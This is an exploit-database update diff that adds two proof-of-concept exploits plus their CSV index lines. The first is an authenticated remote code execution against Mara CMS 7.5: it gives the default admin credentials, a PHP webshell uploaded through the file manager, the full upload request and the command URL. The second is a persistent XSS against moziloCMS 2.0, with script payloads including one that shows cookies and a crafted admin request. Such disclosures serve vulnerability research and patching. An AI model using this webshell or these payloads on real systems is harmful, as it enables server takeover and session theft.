DB: 2020-09-02

2 changes to exploits/shellcodes

Mara CMS 7.5 - Remote Code Execution (Authenticated)
moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)

exploits/php/webapps/48780.txt

@@ -0,0 +1,101 @@
+# Exploit Title: Mara CMS 7.5 - Remote Code Execution (Authenticated)
+# Google Dork: N/A
+# Date: 2020-08-31
+# Exploit Author: Michele Cisternino (0blio_)
+# Vendor Homepage: https://sourceforge.net/projects/maracms/
+# Software Link: https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
+# Version: 7.5
+# Tested on: Kali Linux(x64)
+# CVE: N/A
+
+
+# Description
+
+
+MaraCMS 7.5 is vulnerable to Authenticated Remote Code Execution.
+In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS as 'admin' or 'manager'.
+The file uploader fails to check extensions of files uploaded by the user, so it is possible to upload a webshell and get RCE.
+
+
+# PoC
+
+
+1. Login on MaraCMS. Default credentials are:
+      Username: admin
+      Password: changeme
+
+
+2. Navigate the file upload functionality (http://target/codebase/dir.php?type=filenew) and upload a file called 'webshell.php' with content '<?php system($_GET["cmd"]); ?>'.
+    A request similar to the following will be made:
+
+
+        POST /codebase/handler.php HTTP/1.1
+        Host: localhost
+        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
+        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+        Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3
+        Accept-Encoding: gzip, deflate
+        Content-Type: multipart/form-data; boundary=---------------------------1202504167994776142974823268
+        Content-Length: 1282
+        Origin: http://localhost
+        Connection: close
+        Referer: http://localhost/codebase/dir.php?type=filenew
+        Cookie: your_sitename_session_session=krevi5f3gr416p3o7cqdk4j1vv
+        Upgrade-Insecure-Requests: 1
+
+
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="authenticated"
+
+
+        MQ==
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="action"
+
+
+        dXBsb2Fk
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="MAX_FILE_SIZE"
+
+
+        10485760
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="type"
+
+
+        filenew
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="files[]"; filename="webshell.php"
+        Content-Type: application/x-php
+
+
+        <?php system($_GET["cmd"]); ?>
+
+
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="usr"
+
+
+        YWRtaW4=
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="pwd"
+
+
+        MWUyNzUwMTA3OTgyNzQ2NTQ5ZDZlYWY0MWNmMzcwZTBlZTc3NWNiNWZiNTExMWNhOGI5ZWNjNWI0M2JkOGE2NA==
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="authenticated"
+
+
+        MQ==
+        -----------------------------1202504167994776142974823268
+        Content-Disposition: form-data; name="destdir"
+
+
+
+
+        -----------------------------1202504167994776142974823268--
+
+
+3. Execute remote commands by navigating:
+
+     http://target/webshell.php?cmd=whoami

exploits/php/webapps/48781.txt

@@ -0,0 +1,41 @@
+# Exploit Title: moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)
+# Date: 2020-08-31
+# Exploit Author: Abdulkadir Kaya
+# Vendor Homepage: https://www.mozilo.de/
+# Version: 2.0
+# Tested on: Windows & WampServer
+
+1- Go to following url. >> http://(HOST)/(PATH)/admin/
+2- Login the admin panel. 
+3- Go to "Content".
+4- Write XSS payload in the "Content Page" section.
+5- Save.
+
+NOTE: Content Page must be in the Category.
+
+((XSS Payloads))
+
+1-<script>alert("XSS Confirmed");</script>
+2-<script>alert(document.cookie);</script>
+3-<script>alert(document.domain);</script>
+
+(( REQUEST ))
+
+POST /mozilo/admin/index.php HTTP/1.1
+Host: 127.0.0.1:8088
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html, */*; q=0.01
+Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate
+Referer: http://127.0.0.1:8088/mozilo/admin/index.php?nojs=true&action=catpage&multi=true
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 269
+Origin: http://127.0.0.1:8088
+Connection: close
+Cookie: mozilo_editor_settings=true,false,mozilo,12px; PHPSESSID=1jlbsfbodasafasl121chjv5947j0s; 
+MOZILOID_875895d61510deasdfa1a7ad7cc6047f819=5tqsm5d5nvphqimdpqcnq4tqit
+
+action=catpage&sort_array[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521%2522%2529%253C%252Fscript%253E]
+=%5BWilkommen%5D&changeart=cat_page_move&cat_page_change[%253Cscript%253Ealert%2528%2522XSS%2520Confirmed%2521
+%2522%2529%253C%252Fscript%253E]=%5BWilkommen%5D

files_exploits.csv

@@ -43018,3 +43018,5 @@ id,file,description,date,author,type,platform,port
 48777,exploits/php/webapps/48777.txt,"Mara CMS  7.5 - Reflective Cross-Site Scripting",2020-08-31,"George Tsimpidas",webapps,php,
 48778,exploits/php/webapps/48778.txt,"Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)",2020-08-31,c0mpu7er,webapps,php,
 48779,exploits/php/webapps/48779.py,"CMS Made Simple 2.2.14 - Arbitrary File Upload (Authenticated)",2020-08-31,"Luis Noriega",webapps,php,
+48780,exploits/php/webapps/48780.txt,"Mara CMS 7.5 - Remote Code Execution (Authenticated)",2020-09-01,0blio_,webapps,php,
+48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,